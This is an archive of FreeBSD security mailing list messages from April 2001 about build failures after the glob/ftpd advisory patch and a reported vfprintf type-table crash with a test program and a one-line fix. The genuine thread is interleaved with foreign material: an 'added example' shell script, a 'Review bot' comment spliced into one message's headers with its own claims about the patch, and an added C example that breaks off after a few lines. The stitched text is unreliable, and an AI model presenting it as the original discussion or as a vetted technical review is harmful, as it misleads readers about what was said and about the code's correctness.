On Thu, Apr 19, 2001 at 02:32:09PM -0500, Chris Byrnes wrote:
> indeed i did
>

I am unable to reproduce this on a 4.2-STABLE box from December.
The updated patch definitely adds GLOB_MAXPATH to glob.h so I
have no idea why your ftpcmd.y is not picking it up.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

> On Thu, 19 Apr 2001, Chris Faulhaber wrote:
>
> > On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote:
> > > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse':
> > > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use
> > > in this function)
> > > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is
> > > reported only once
> > > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.)
> > > *** Error code 1
> > >
> >
> > Did you copy the patched /usr/src/include/glob.h to /usr/include/
> > like the revised advisory states?
> >

From owner-freebsd-security Thu Apr 19 12:43:26 2001
Date: Thu, 19 Apr 2001 12:43:16 -0700
From: Kris Kennaway
To: Chris Byrnes
Cc: Chris Faulhaber , security@FreeBSD.ORG
Subject: Re: Security, glob FTP, new fix
Message-ID: <20010419124316.B53464@xor.obsecurity.org>
References: <20010419153104.C81766@peitho.fxp.org>

On Thu, Apr 19, 2001 at 02:32:09PM -0500, Chris Byrnes wrote:
> > Did you copy the patched /usr/src/include/glob.h to /usr/include/
> > like the revised advisory states?
             ^^^^^^^
> indeed i did

The revised advisory has only been out for a few minutes, are you sure
you got the UPDATED patch?

Kris

From owner-freebsd-security Thu Apr 19 12:43:55 2001
Date: Thu, 19 Apr 2001 14:42:53 -0500 (CDT)
From: Chris Byrnes
To: Chris Faulhaber
Subject: Re: Security, glob FTP, new fix
In-Reply-To: <20010419154308.D81766@peitho.fxp.org>

Perhaps removing /usr/src/libexec/ftpd and doing a new cvsup would fix the
problem?

Chris Byrnes, chris@JEAH.net
JEAH Communications, http://www.JEAH.net
608.244.9525 (Toll), 1.866.AWW.JEAH (Toll-Free)

On Thu, 19 Apr 2001, Chris Faulhaber wrote:

> On Thu, Apr 19, 2001 at 02:32:09PM -0500, Chris Byrnes wrote:
> > indeed i did
> >
>
> I am unable to reproduce this on a 4.2-STABLE box from December.
> The updated patch definitely adds GLOB_MAXPATH to glob.h so I
> have no idea why your ftpcmd.y is not picking it up.
>
> --
> Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> --------------------------------------------------------
> FreeBSD: The Power To Serve - http://www.FreeBSD.org
>
> > On Thu, 19 Apr 2001, Chris Faulhaber wrote:
> >
> > > On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote:
> > > > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse':
> > > > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use
> > > > in this function)
> > > > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is
> > > > reported only once
> > > > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.)
> > > > *** Error code 1
> > > >
> > >
> > > Did you copy the patched /usr/src/include/glob.h to /usr/include/
> > > like the revised advisory states?
> > >
>

From owner-freebsd-security Thu Apr 19 13: 7:44 2001
Date: Thu, 19 Apr 2001 13:07:36 -0700 (PDT)
From: Jeff Wyman
To: freebsd-security@freebsd.org
Subject: Yet another Glob-related problem

Alright. I am running 4.2-RELEASE on my system, and seem to be having
problems that I haven't exactly seen on the list yet (unless I'm looking
wrong). I have a fresh source tree, with the revised glob patch applied,
as well as the new glob.h installed. When compiling glob.c in the make of
libc, I get this error:

cc -O -pipe -mpentium -march=pentium -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o
/usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
/usr/src/lib/libc/../libc/gen/glob.c:199: `GLOB_BRACE' undeclared (first use in this function)
/usr/src/lib/libc/../libc/gen/glob.c:199: (Each undeclared identifier is reported only once
/usr/src/lib/libc/../libc/gen/glob.c:199: for each function it appears in.)
*** Error code 1

Stop in /usr/src/lib/libc.

Sorry for the wrappage. I use pine, a serious problem many think I need
treatment for.

Please cc responses to my email address if you'd like, else I'll just
check the archives every few hours (I'm not subscribed).

--------------------------------------------------------------------------
There's so much bullshit in space that there couldn't possibly be any
good reason for any god to wish to create it.
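Every build failure in this thread (GLOB_MAXPATH undeclared in ftpcmd.y, GLOB_BRACE undeclared in glob.c) comes down to which copy of glob.h the compiler is actually reading, and the replies all ask the same two questions by hand: does the installed header match the patched source-tree header, and does the preprocessor pick that header up. The POSIX shell script below is an added example, not something posted in the thread or shipped with FreeBSD. It assumes the advisory's paths /usr/src/include/glob.h and /usr/include/glob.h as defaults, a C compiler reachable as $CC or cc for the preprocessor check, and the two macro names named in the thread (GLOB_MAXPATH, which the revised SA-01:33 patch adds, and GLOB_BRACE, present since the 4.4BSD-lite import); the function names and the GLOB_MACROS override are mine.

```shell
#!/bin/sh
# Added example, not from the thread or the FreeBSD tree: report which glob.h
# the build will really see. Assumptions: the advisory's default paths
# /usr/src/include/glob.h and /usr/include/glob.h, and a C compiler reachable
# as $CC or cc for the preprocessor check.

# header_has_macro FILE MACRO -- succeeds if FILE has a "#define MACRO" line.
header_has_macro() {
    grep -Eq "^[[:space:]]*#[[:space:]]*define[[:space:]]+$2([[:space:]]|\$)" "$1"
}

# missing_macros FILE MACRO... -- prints the macros FILE does not define,
# space separated; exit status 0 only if none are missing.
missing_macros() {
    file=$1; shift
    missing=""
    for m in "$@"; do
        header_has_macro "$file" "$m" || missing="$missing $m"
    done
    missing=${missing# }
    printf '%s\n' "$missing"
    [ -z "$missing" ]
}

# headers_in_sync SRC INSTALLED -- succeeds if INSTALLED is byte-for-byte the
# source-tree copy, i.e. the advisory's "cp /usr/src/include/glob.h
# /usr/include/" step was really done after patching.
headers_in_sync() {
    cmp -s "$1" "$2"
}

# compiler_sees_macro MACRO -- asks the preprocessor (cc -E -dM dumps every
# macro defined after preprocessing) whether the <glob.h> on *its* include
# path defines MACRO. Returns 0 yes, 1 no, 2 if no compiler is available.
compiler_sees_macro() {
    cc=${CC:-cc}
    command -v "$cc" >/dev/null 2>&1 || return 2
    printf '#include <glob.h>\n' | "$cc" -E -dM -x c - 2>/dev/null \
        | grep -Eq "^#define[[:space:]]+$1([[:space:]]|\$)"
}

# check_glob_header [SRC] [INSTALLED] -- full report; exit 0 only if both
# copies define the expected macros, match each other, and the preprocessor
# agrees. GLOB_MACROS overrides the macro list (GLOB_MAXPATH is what the
# revised SA-01:33 patch adds; GLOB_BRACE has been there since 4.4BSD-lite).
check_glob_header() {
    src=${1:-/usr/src/include/glob.h}
    inst=${2:-/usr/include/glob.h}
    macros=${GLOB_MACROS:-"GLOB_BRACE GLOB_MAXPATH"}
    status=0
    for f in "$src" "$inst"; do
        if [ ! -r "$f" ]; then
            echo "MISSING: $f"; status=1; continue
        fi
        miss=$(missing_macros "$f" $macros) || { echo "$f lacks: $miss"; status=1; }
    done
    if [ -r "$src" ] && [ -r "$inst" ] && ! headers_in_sync "$src" "$inst"; then
        echo "$inst differs from $src (redo the advisory's cp step)"; status=1
    fi
    for m in $macros; do
        compiler_sees_macro "$m"; rc=$?
        case $rc in
            0) echo "preprocessor sees $m" ;;
            1) echo "preprocessor does NOT see $m: another glob.h is first on the include path"; status=1 ;;
            *) echo "no C compiler found ($cc); preprocessor check skipped"; break ;;
        esac
    done
    return $status
}
```

Run it on the box whose build fails, e.g. `sh check_glob.sh` for the advisory's paths or `sh check_glob.sh /usr/src/include/glob.h /usr/include/glob.h`, and call `check_glob_header` from the script's end; a non-zero exit pinpoints which of the three conditions (macro missing from a copy, copies out of sync, preprocessor reading a different header) is behind the `undeclared` error before anything is re-cvsupped.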
From owner-freebsd-security Thu Apr 19 13:11:51 2001
Date: Thu, 19 Apr 2001 16:11:48 -0400
From: Chris Faulhaber
To: Jeff Wyman
Cc: freebsd-security@freebsd.org
Subject: Re: Yet another Glob-related problem
Message-ID: <20010419161148.F81766@peitho.fxp.org>

On Thu, Apr 19, 2001 at 01:07:36PM -0700, Jeff Wyman wrote:
> Alright. I am running 4.2-RELEASE on my system, and seem to be having
> problems that I haven't exactly seen on the list yet (unless I'm looking
> wrong). I have a fresh source tree, with the revised glob patch applied,
> as well as the new glob.h installed. When compiling glob.c in the make of
> libc, I get this error:
>
> cc -O -pipe -mpentium -march=pentium -DLIBC_RCS -DSYSLIBC_RCS
> -I/usr/src/lib/lib
> c/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> -I/usr/src/lib/libc/..
> /libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o
> glob.o
> /usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
> /usr/src/lib/libc/../libc/gen/glob.c:199: `GLOB_BRACE' undeclared (first
> use in
> this function)

Could you check the validity of your glob.h?  GLOB_BRACE has been
present in glob.h since the 4.4BSD-lite import.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 13:15:43 2001
Message-ID: <3ADF479E.48C2BF0B@packeteer.com>
Date: Thu, 19 Apr 2001 13:16:30 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
To: security@freebsd.org
Subject: Another glob problem

Meanwhile, *my* build is failing in mpool.c:

cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/db/hash/hsearch.c -o hsearch.o
cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/db/hash/ndbm.c -o ndbm.o
cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/db/mpool/mpool.c -o mpool.o
/usr/src/lib/libc/../libc/db/mpool/mpool.c: In function `mpool_open':
/usr/src/lib/libc/../libc/db/mpool/mpool.c:89: structure has no member named `tqh_first'
/usr/src/lib/libc/../libc/db/mpool/mpool.c:89: structure has no member named `tqh_last'
/usr/src/lib/libc/../libc/db/mpool/mpool.c:89: structure has no member named `tqh_first'
/usr/src/lib/libc/../libc/db/mpool/mpool.c:91: structure has no member named `tqh_first'

... and so on for about 100 more of these missing member references. Then
it Error 1's.

I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
and a fresh make world as of about ten minutes ago. Anybody else gotten
this far?

Brian

From owner-freebsd-security Thu Apr 19 13:17:19 2001
Date: Thu, 19 Apr 2001 13:17:15 -0700
From: Kris Kennaway
To: Jeff Wyman
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Yet another Glob-related problem
Message-ID: <20010419131715.A54132@xor.obsecurity.org>

On Thu, Apr 19, 2001 at 01:07:36PM -0700, Jeff Wyman wrote:
> Alright. I am running 4.2-RELEASE on my system, and seem to be having
> problems that I haven't exactly seen on the list yet (unless I'm looking
> wrong). I have a fresh source tree, with the revised glob patch applied,
> as well as the new glob.h installed. When compiling glob.c in the make of
> libc, I get this error:
>
> cc -O -pipe -mpentium -march=pentium -DLIBC_RCS -DSYSLIBC_RCS
> -I/usr/src/lib/lib
> c/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE
> -I/usr/src/lib/libc/..
> /libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o
> glob.o
> /usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
> /usr/src/lib/libc/../libc/gen/glob.c:199: `GLOB_BRACE' undeclared (first
> use in
> this function)
> /usr/src/lib/libc/../libc/gen/glob.c:199: (Each undeclared identifier is
> reporte
> d only once
> /usr/src/lib/libc/../libc/gen/glob.c:199: for each function it appears
> in.)
> *** Error code 1

Something is screwed up on your system: GLOB_BRACE has been in
since 1994:

1.1 (rgrimes 24-May-94): #define GLOB_BRACE 0x0080 /* Expand braces ala csh. */

Kris

From owner-freebsd-security Thu Apr 19 13:22: 9 2001
Date: Thu, 19 Apr 2001 13:22:02 -0700 (PDT)
From: Jeff Wyman
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Yet another Glob-related problem
In-Reply-To: <20010419131715.A54132@xor.obsecurity.org>

Well, I don't know what to say. The line is present in both /usr/include/glob.h and /usr/src/include/glob.h (I tried with both new and old files to make sure both of those locations had the right files).

#define GLOB_BRACE 0x0080 /* Expand braces ala csh. */

Seems to be it.

> Something is screwed up on your system: GLOB_BRACE has been in
> since 1994:
>
> 1.1 (rgrimes 24-May-94): #define GLOB_BRACE 0x0080 /* Expand braces ala csh. */
>
> Kris
>

From owner-freebsd-security Thu Apr 19 13:23:16 2001
Message-ID: <3ADF4965.6253D0B7@packeteer.com>
Date: Thu, 19 Apr 2001 13:24:05 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
X-Mailer: Mozilla 4.74 [en] (Win98; U)
To: security@freebsd.org
Subject: Re: Another glob problem

> I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
> and a fresh make world as of about ten minutes ago.

Argh... let me rephrase that.

I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to be the right one) and a fresh cvsup as of about ten minutes ago.

Yeesh..

Brian

From owner-freebsd-security Thu Apr 19 13:25:49 2001
Date: Thu, 19 Apr 2001 16:25:43 -0400 (EDT)
From: Chris Faulhaber
To: Brian Tiemann
Cc: security@freebsd.org
Subject: Re: Another glob problem
Message-ID: <20010419162543.G81766@peitho.fxp.org>
References: <3ADF4965.6253D0B7@packeteer.com>
User-Agent: Mutt/1.2.5i
In-Reply-To: <3ADF4965.6253D0B7@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 01:24:05PM -0700

On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote:
> > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
> > and a fresh make world as of about ten minutes ago.
>
> Argh... let me rephrase that.
>
> I'm running 4.2-RELEASE, with the March 22 glob.h installed in
> /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to
> be the right one) and a fresh cvsup as of about ten minutes ago.
>
> Yeesh..
>

A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former, the patch is not required.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 13:37:59 2001
Message-ID: <3ADF4DD0.17AB0F64@homepage.ru>
Date: Fri, 20 Apr 2001 00:42:56 +0400
From: "D. K."
X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 4.2-RELEASE i386)
To: security@FreeBSD.ORG
Subject: FreeBSD grow bug

Hello All!

I played with format strings in the *printf functions and have found a bug in the libc library on my FreeBSD 4.2-RELEASE machine.

The bug is in the /usr/src/lib/libc/stdio/vfprintf.c source, in the function __grow_type_table, which is used by the function vfprintf. The first parameter of the memset function is incorrectly counted up. All *printf functions which use vfprintf have this error.

Test example:
===beg test.c===
#include <stdio.h>

int main(int argc, char **argv) {
	printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7);
	/* the second call, with argument 8, is the one that crashes */
	printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8);
	printf("no grow bug\n");
	return 0;
}
===end test.c===

Results:
# ./test
7
Segmentation fault (core dumped)

If you have seen the eight, it means that your system does not have this bug.

The error appears when the parameter after % is more than seven.

Quick patch:
===beg grow_patch===
--- vfprintf.c.old	Sat Aug 28 04:01:20 1999
+++ vfprintf.c	Thu Apr 19 22:16:19 2001
@@ -1191,7 +1191,7 @@
 		    reallocf (typetable, sizeof (unsigned char) * newsize);

 	}
-	memset (&typetable [*tablesize], T_UNUSED, (newsize - *tablesize));
+	memset (*typetable + *tablesize, T_UNUSED, (newsize - *tablesize));

 	*tablesize = newsize;
 }
===end grow_patch===

Best Regards,
Dmitry Kopteloff
---
LG Soft Lab.
Information Security Group, RUSSIA

From owner-freebsd-security Thu Apr 19 13:40:48 2001
Message-ID: <3ADF4D4E.DCD96209@packeteer.com>
Date: Thu, 19 Apr 2001 13:40:46 -0700
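Review bot: the one-line fix is correct, but the unchanged context line `reallocf (typetable, sizeof (unsigned char) * newsize);` carries the same pointer-level mistake and should be corrected in the same patch. The replacement line treats `typetable` as the address of the table pointer (`*typetable + *tablesize` is `*tablesize` bytes into the table), so the old `&typetable [*tablesize]` was `*tablesize` pointer-widths past the pointer variable itself, and the memset wrote T_UNUSED there rather than into the freshly grown table; by the same token `reallocf (typetable, ...)` hands reallocf the pointer variable's address rather than the heap table `*typetable`. A sentence spelling out these two levels of indirection would make the description clearer than "the first parameter of the memset function is incorrectly counted up".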
From: Brian Tiemann
Organization: Packeteer, Inc.
X-Mailer: Mozilla 4.74 [en] (Win98; U)
To: Chris Faulhaber
Cc: security@freebsd.org
Subject: Re: Another glob problem
References: <3ADF4965.6253D0B7@packeteer.com> <20010419162543.G81766@peitho.fxp.org>

Yes, that's what I thought. It's RELENG_4, and I didn't apply the patch.

I also tried multiple make cleans, and also deleting /usr/src/lib/libc/db/mpool and rebuilding. Same problem.

I've disabled my ftpd for now, until we can figure this out. This must be a particularly amorphous code region across different systems.

Brian

Chris Faulhaber wrote:
>
> On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote:
> > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
> > > and a fresh make world as of about ten minutes ago.
> >
> > Argh... let me rephrase that.
> >
> > I'm running 4.2-RELEASE, with the March 22 glob.h installed in
> > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to
> > be the right one) and a fresh cvsup as of about ten minutes ago.
> >
> > Yeesh..
> >
>
> A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former,
> the patch is not required.
>
> --
> Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> --------------------------------------------------------
> FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 13:42:54 2001
Date: Thu, 19 Apr 2001 16:42:39 -0400 (EDT)
From: Rob Simmons
To: "D. K."
Subject: Re: FreeBSD grow bug
In-Reply-To: <3ADF4DD0.17AB0F64@homepage.ru>
Message-ID: <20010419164112.C72854-100000@mail.wlcg.com>

That has been fixed since 4.2-RELEASE.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 20 Apr 2001, D. K. wrote:
> Hello All!
>
> I played with format strings in the *printf functions
> and have found a bug in the libc library on my FreeBSD 4.2-RELEASE
> machine.
>
> The bug is in the /usr/src/lib/libc/stdio/vfprintf.c source,
> in the function __grow_type_table, which is used by the function
> vfprintf. The first parameter of the memset function is
> incorrectly counted up. All *printf functions which use
> vfprintf have this error.
>
> Test example:
> ===beg test.c===
> #include <stdio.h>
>
> int main(int argc, char **argv) {
> 	printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7);
> 	printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8);
> 	printf("no grow bug\n");
> 	return 0;
> }
> ===end test.c===
>
> Results:
> # ./test
> 7
> Segmentation fault (core dumped)
>
> If you have seen the eight, it means that your system
> does not have this bug.
>
> The error appears when the parameter after % is more than seven.
>
> Quick patch:
> ===beg grow_patch===
> --- vfprintf.c.old	Sat Aug 28 04:01:20 1999
> +++ vfprintf.c	Thu Apr 19 22:16:19 2001
> @@ -1191,7 +1191,7 @@
>  		    reallocf (typetable, sizeof (unsigned char) * newsize);
>
>  	}
> -	memset (&typetable [*tablesize], T_UNUSED, (newsize - *tablesize));
> +	memset (*typetable + *tablesize, T_UNUSED, (newsize - *tablesize));
>
>  	*tablesize = newsize;
>  }
> ===end grow_patch===
>
>
> Best Regards,
> Dmitry Kopteloff
> ---
> LG Soft Lab.
> Information Security Group, RUSSIA
>

From owner-freebsd-security Thu Apr 19 13:43:00 2001
Date: Thu, 19 Apr 2001 16:42:40 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200104192042.QAA40625@khavrinen.lcs.mit.edu>
To: "D. K."
Cc: security@FreeBSD.ORG
Subject: FreeBSD grow bug
In-Reply-To: <3ADF4DD0.17AB0F64@homepage.ru>
References: <3ADF4DD0.17AB0F64@homepage.ru>

< said:
> int main(int argc, char **argv) {
> 	printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7);
> 	printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8);
> 	printf("no grow bug\n");
> 	return 0;
> }

This code is erroneous. If the format string does not reference all positional arguments up to and including the numerically greatest one named, the result of *printf() is undefined. This is not a security matter; replies to , please.

-GAWollman

From owner-freebsd-security Thu Apr 19 13:44:16 2001
Subject: RE: Another glob problem
Date: Thu, 19 Apr 2001 16:44:03 -0400
Message-ID: <0639433A0E004844AC0D1B91E0CF4D6308DA77@mightymouse.BLACKBIRD.BLACKBIRDTECH.COM>
From: "Ben Vaughn"
To: "Brian Tiemann", "Chris Faulhaber"

I am also experiencing this problem building from a 10-minute old stable-cvsup.

-biv

-----Original Message-----
From: Brian Tiemann [mailto:briant@packeteer.com]
Sent: Thursday, April 19, 2001 16:41
To: Chris Faulhaber
Cc: security@freebsd.org
Subject: Re: Another glob problem

Yes, that's what I thought. It's RELENG_4, and I didn't apply the patch.

I also tried multiple make cleans, and also deleting /usr/src/lib/libc/db/mpool and rebuilding. Same problem.

I've disabled my ftpd for now, until we can figure this out. This must be a particularly amorphous code region across different systems.

Brian

Chris Faulhaber wrote:
>
> On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote:
> > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
> > > and a fresh make world as of about ten minutes ago.
> >
> > Argh... let me rephrase that.
> >
> > I'm running 4.2-RELEASE, with the March 22 glob.h installed in
> > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to
> > be the right one) and a fresh cvsup as of about ten minutes ago.
> >
> > Yeesh..
> >
>
> A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former,
> the patch is not required.
>
> --
> Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> --------------------------------------------------------
> FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 13:45:04 2001
Date: Thu, 19 Apr 2001 15:29:46 -0500 (CDT)
From: Dan Debertin
To: "freebsd-security@freebsd.org"
Subject: Re: Tripwire or the like for FreeBSD ?
In-Reply-To: <3ADF3CCC.FB8498DC@emre.de>

On Thu, 19 Apr 2001, Emre Bastuz wrote:
>
> I found something called "Aide" in the ports directory, but to be honest -
> I don't trust a "Version 0.7" when it comes to security.

Nothing wrong with honesty. Lots of software released as "1.0" or "5.2" is actually no better than beta-quality. ProFTPd and GNOME both come to mind.... Conversely, I've used plenty of very stable software that hasn't hit 1.0 yet.

In specific reference to AIDE, we use it here. It's a huge memory hog and is painful to work with. It's worse than tripwire in terms of ease of administration, but it does the job. The config file syntax is nicer, though.

Dan Debertin

--
++ I do not drink tea.
++ Dan Debertin
++ Senior Systems Administrator
++ Bitstream Underground, LLC
++ airboss@bitstream.net
++ (612)321-9290 x108
++ GPG Fingerprint: 0BC5 F4D6 649F D0C8 D1A7 CAE4 BEF4 0A5C 300D 2387

From owner-freebsd-security Thu Apr 19 13:52:58 2001
Date: Thu, 19 Apr 2001 16:53:09 -0400 (EDT)
From: Rob Simmons
To: Ben Vaughn
Cc: Brian Tiemann, Chris Faulhaber
Subject: RE: Another glob problem
In-Reply-To: <0639433A0E004844AC0D1B91E0CF4D6308DA77@mightymouse.BLACKBIRD.BLACKBIRDTECH.COM>
Message-ID: <20010419164947.M72854-100000@mail.wlcg.com>

Have you tried moving your kernel config file, and any other files that you need, from /usr/src to /root, then deleting the whole /usr/src, /usr/obj, and /usr/sup/src-all directories before running cvsup? When you are done, just move your kernel config file back where it belongs, and try again.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Thu, 19 Apr 2001, Ben Vaughn wrote:
> I am also experiencing this problem building from a 10-minute
> old stable-cvsup.
>
> -biv
>
> -----Original Message-----
> From: Brian Tiemann [mailto:briant@packeteer.com]
> Sent: Thursday, April 19, 2001 16:41
> To: Chris Faulhaber
> Cc: security@freebsd.org
> Subject: Re: Another glob problem
>
>
> Yes, that's what I thought. It's RELENG_4, and I didn't apply the
> patch.
>
> I also tried multiple make cleans, and also deleting
> /usr/src/lib/libc/db/mpool and rebuilding. Same problem.
>
> I've disabled my ftpd for now, until we can figure this out. This must
> be a particularly amorphous code region across different systems.
>
> Brian
>
>
> Chris Faulhaber wrote:
> >
> > On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote:
> > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src
> > > > and a fresh make world as of about ten minutes ago.
> > >
> > > Argh... let me rephrase that.
> > >
> > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in
> > > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to
> > > be the right one) and a fresh cvsup as of about ten minutes ago.
> > >
> > > Yeesh..
> > >
> >
> > A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former,
> > the patch is not required.
> >
> > --
> > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> > --------------------------------------------------------
> > FreeBSD: The Power To Serve - http://www.FreeBSD.org
>

From owner-freebsd-security Thu Apr 19 14:06:02 2001
Message-ID: <3ADF5442.BD703D6@homepage.ru>
Date: Fri, 20 Apr 2001 01:10:26 +0400
From: "D. K."
X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 4.2-RELEASE i386)
To: Garrett Wollman, security@FreeBSD.ORG
Subject: Re: FreeBSD grow bug
References: <3ADF4DD0.17AB0F64@homepage.ru> <200104192042.QAA40625@khavrinen.lcs.mit.edu>

Garrett Wollman wrote:
>
> < said:
>
> > int main(int argc, char **argv) {
> > 	printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7);
> > 	printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8);
> > 	printf("no grow bug\n");
> > 	return 0;
> > }
>
> This code is erroneous. If the format string does not reference all
> positional arguments up to and including the numerically greatest one
> named, the result of *printf() is undefined. This is not a security
> matter; replies to , please.

You are not right;) See the format string reference or the next example:

#include <stdio.h>

int main(int argc, char **argv) {
	char buf[100];
	sprintf(buf, "%d%d%d%d%d%d%d %7$x\n", 1, 2, 3, 4, 5, 6, 7);
	printf("%s", buf);
	sprintf(buf, "%d%d%d%d%d%d%d%d %8$x\n", 1, 2, 3, 4, 5, 6, 7, 8);
	printf("%s", buf);
	printf("no grow bug\n");
	return 0;
}

Best Regards,
Dmitry Kopteloff
---
LG Soft Lab.
Information Security Group, RUSSIA

From owner-freebsd-security Thu Apr 19 14:13:53 2001
Date: Thu, 19 Apr 2001 17:13:31 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200104192113.RAA40978@khavrinen.lcs.mit.edu>
To: "D. K."
Cc: security@FreeBSD.ORG, freebsd-standards@bostonradio.org
Subject: Re: FreeBSD grow bug
In-Reply-To: <3ADF5442.BD703D6@homepage.ru>
References: <3ADF4DD0.17AB0F64@homepage.ru> <200104192042.QAA40625@khavrinen.lcs.mit.edu> <3ADF5442.BD703D6@homepage.ru>

< said:
> You are not right

To quote from the Austin Group draft 6:

    The format can contain either numbered argument conversion
    specifications (that is, "%n$" and "*m$"), or unnumbered argument
    conversion specifications (that is, % and *), but not
                                                  ^^^^^^^
    both. The only exception to this is that %% can be mixed with
    ^^^^^
    the "%n$" form. The results of mixing numbered and unnumbered
    argument specifications in a format string are undefined. When
    numbered argument specifications are used, specifying the Nth
                                               ^^^^^^^^^^^^^^^^^^
    argument requires that all the leading arguments, from the
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    first to the (N-1)th, are specified in the format string.
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The exact same language, spread out over several paragraphs, appears in the Single UNIX Spec version 2.

-GAWollman

From owner-freebsd-security Thu Apr 19 14:47:53 2001
Date: Thu, 19 Apr 2001 16:47:48 -0500
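The positional-argument rule Garrett Wollman quotes above, applied in code: an added example written for this page, not FreeBSD's vfprintf.c and not either poster's code. It scans a format string into a per-argument type table that grows with the corrected memset from Dmitry Kopteloff's patch, then reports a gap (as in `%7$x` on its own) or a mix of numbered and unnumbered conversions (as in his second test); the value of T_UNUSED, the 8-entry starting table and the function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define T_UNUSED 0              /* "argument never referenced"; value assumed */
#define STATIC_ARG_TBL_SIZE 8   /* small initial table so growth gets exercised */

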